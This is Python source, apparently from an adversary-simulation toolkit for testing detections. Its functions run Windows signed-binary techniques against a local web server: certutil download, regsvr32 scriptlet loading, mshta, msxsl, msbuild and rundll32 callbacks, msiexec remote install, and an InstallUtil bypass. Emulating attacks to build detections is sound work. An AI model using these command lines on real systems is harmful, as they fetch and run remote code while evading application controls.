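def main():
    """Run the MsXsl beacon simulation against a local web server.

    Serves the web root, rewrites the callback URL inside XSL_FILE so it
    points at that server, then runs MS_XSL over XML_FILE / XSL_FILE.
    The HTTP server is shut down in ``finally`` so a failure in the patch
    or execute step does not leave the listener bound (the original only
    shut it down on the success path).
    """
    common.log("MsXsl Beacon")
    server, ip, port = common.serve_web()
    try:
        common.clear_web_cache()
        new_callback = "http://%s:%d" % (ip, port)
        common.log("Updating the callback to %s" % new_callback)
        # NOTE(review): XSL_FILE is patched in place; whether CALLBACK_REGEX
        # still matches the rewritten URL on a repeat run is not visible here.
        common.patch_regex(XSL_FILE, common.CALLBACK_REGEX, new_callback)
        common.execute([MS_XSL, XML_FILE, XSL_FILE])
    finally:
        server.shutdown()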
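def main():
    """Fetch bin/mydll.dll from the local web server with certutil.exe.

    The file is written to the working directory as mydll.dll via
    ``certutil -urlcache -split -f`` and removed again after a successful
    run. The HTTP server is shut down in ``finally`` so a failed download
    does not leave it running; per the original comment it would also end
    with the main thread if it was started as a daemon.
    """
    server, ip, port = common.serve_web()
    uri = "bin/mydll.dll"
    target_file = "mydll.dll"
    try:
        common.clear_web_cache()
        url = "http://{ip}:{port}/{uri}".format(ip=ip, port=port, uri=uri)
        common.execute(
            ["certutil.exe", "-urlcache", "-split", "-f", url, target_file])
    finally:
        server.shutdown()
    # Only reached when the download step did not raise, as in the original.
    common.remove_file(target_file)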
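def main():
    """Run the MsHta beacon simulation against a local web server.

    Rewrites the callback URL inside HTA_FILE to the served address and
    launches it with mshta.exe. ``timeout=10, kill=True`` bounds the run;
    presumably mshta would otherwise stay open — confirm against
    common.execute. The server is shut down in ``finally`` (the original
    only did so on the success path).
    """
    common.log("MsHta Beacon")
    server, ip, port = common.serve_web()
    try:
        common.clear_web_cache()
        new_callback = "http://%s:%d" % (ip, port)
        common.log("Updating the callback to %s" % new_callback)
        common.patch_regex(HTA_FILE, common.CALLBACK_REGEX, new_callback)
        common.execute(["mshta.exe", HTA_FILE], timeout=10, kill=True)
    finally:
        server.shutdown()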
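def main():
    """Run the RegSvr32 .sct simulation against a local web server.

    Points regsvr32.exe at bin/notepad.sct on the served root via
    ``/i:<url> scrobj.dll``, then kills any notepad.exe the scriptlet
    started. The server is shut down in ``finally`` so a failing
    regsvr32 step does not leave the listener bound.
    """
    common.log("RegSvr32 with .sct backdoor")
    server, ip, port = common.serve_web()
    try:
        common.clear_web_cache()
        uri = 'bin/notepad.sct'
        url = 'http://%s:%d/%s' % (ip, port, uri)
        common.execute(
            ["regsvr32.exe", "/u", "/n", "/s", "/i:%s" % url, "scrobj.dll"])
        # Cleanup stays on the success path, as in the original.
        common.log("Killing all notepads to cleanup", "-")
        common.execute(["taskkill", "/f", "/im", "notepad.exe"])
    finally:
        server.shutdown()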
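def main():
    """Run the MsiExec HTTP download simulation.

    Installs bin/Installer.msi straight from the local web server with
    ``msiexec /quiet /i <url>`` and then uninstalls it again. The package
    URL is built once and reused for both steps (the original duplicated
    the format string). The server is shut down in ``finally``.
    """
    common.log("MsiExec HTTP Download")
    server, ip, port = common.serve_web()
    try:
        common.clear_web_cache()
        msi_url = "http://%s:%d/bin/Installer.msi" % (ip, port)
        common.execute(["msiexec.exe", "/quiet", "/i", msi_url])
        # Uninstall only after a successful install, as in the original.
        common.log("Cleanup", log_type="-")
        common.execute(["msiexec", "/quiet", "/uninstall", msi_url])
    finally:
        server.shutdown()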
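def main():
    """Run the MsBuild beacon simulation against a local web server.

    Copies bin/BadTasks.csproj to a temporary project file, rewrites its
    callback URL to the served address and builds it with MS_BUILD. The
    temporary project is removed whenever the copy succeeded, and the
    server is shut down in ``finally`` (the original skipped both cleanup
    steps if the build raised).
    """
    common.log("MsBuild Beacon")
    server, ip, port = common.serve_web()
    try:
        common.clear_web_cache()
        new_callback = "http://%s:%d" % (ip, port)
        common.log("Updating the callback %s" % new_callback)
        target_task = "tmp-file.csproj"
        common.copy_file(common.get_path("bin", "BadTasks.csproj"), target_task)
        try:
            common.patch_regex(target_task, common.CALLBACK_REGEX, new_callback)
            common.execute([MS_BUILD, target_task])
        finally:
            common.remove_file(target_task)
    finally:
        server.shutdown()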
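def main():
    """Run the RunDLL32 / setupapi InstallHinfSection simulation.

    Rewrites the callback URL inside INF_FILE to the served address, then
    runs ``rundll32 setupapi.dll,InstallHinfSection DefaultInstall 128
    INF_FILE``. The taskkill cleanup uses the list form that the other
    scripts use instead of a single command string. The server is shut
    down in ``finally`` (the original only did so on the success path).
    """
    common.log("RunDLL32 with Script Object and Network Callback")
    server, ip, port = common.serve_web()
    try:
        callback = "http://%s:%d" % (ip, port)
        common.clear_web_cache()
        common.patch_regex(INF_FILE, common.CALLBACK_REGEX, callback)
        rundll32 = "rundll32.exe"
        dll_entrypoint = "setupapi.dll,InstallHinfSection"
        common.execute(
            [rundll32, dll_entrypoint, "DefaultInstall", "128", INF_FILE],
            shell=False)
        # Short grace period before cleanup, kept from the original.
        time.sleep(1)
        common.log("Cleanup", log_type="-")
        common.execute(["taskkill", "/f", "/im", "notepad.exe"])
    finally:
        server.shutdown()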
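def main():
    """Run the InstallUtil simulation against a local web server.

    Patches the ``:8000`` wide-string port inside MY_DOT_NET to the served
    port, writes the result as mydotnet.exe and runs it through
    InstallUtil.exe ``/U``. When neither .NET 4 InstallUtil path exists,
    the interpreter is copied to a local InstallUtil.exe and used to make
    the HTTP request instead.

    Changes from the original: the redundant ``fallback`` flag and the
    duplicate ``clear_web_cache`` call are gone, the candidate lookup is a
    single ``next`` over both paths, and every temp file plus the server
    is cleaned up in ``finally`` rather than only on the success path.
    """
    server, ip, port = common.serve_web()
    target_app = "mydotnet.exe"
    try:
        common.clear_web_cache()
        common.patch_file(MY_DOT_NET, common.wchar(":8000"),
                          common.wchar(":%d" % port), target_file=target_app)
        try:
            candidates = (
                "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe",
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe",
            )
            install_util = next(
                (path for path in candidates if os.path.exists(path)), None)
            if install_util is not None:
                common.execute([
                    install_util, '/logfile=', '/LogToConsole=False', '/U',
                    target_app
                ])
            else:
                common.log("Unable to find InstallUtil, creating temp file")
                install_util = os.path.abspath("InstallUtil.exe")
                common.copy_file(sys.executable, install_util)
                try:
                    # NOTE(review): the one-liner uses the Python 2
                    # ``urllib.urlopen`` API and common.LOCAL_IP rather than
                    # the ``ip`` returned by serve_web; left unchanged.
                    common.execute([
                        install_util, "-c",
                        "import urllib; urllib.urlopen('http://%s:%d')" %
                        (common.LOCAL_IP, port)
                    ])
                finally:
                    common.remove_file(install_util)
        finally:
            common.remove_file(target_app)
    finally:
        server.shutdown()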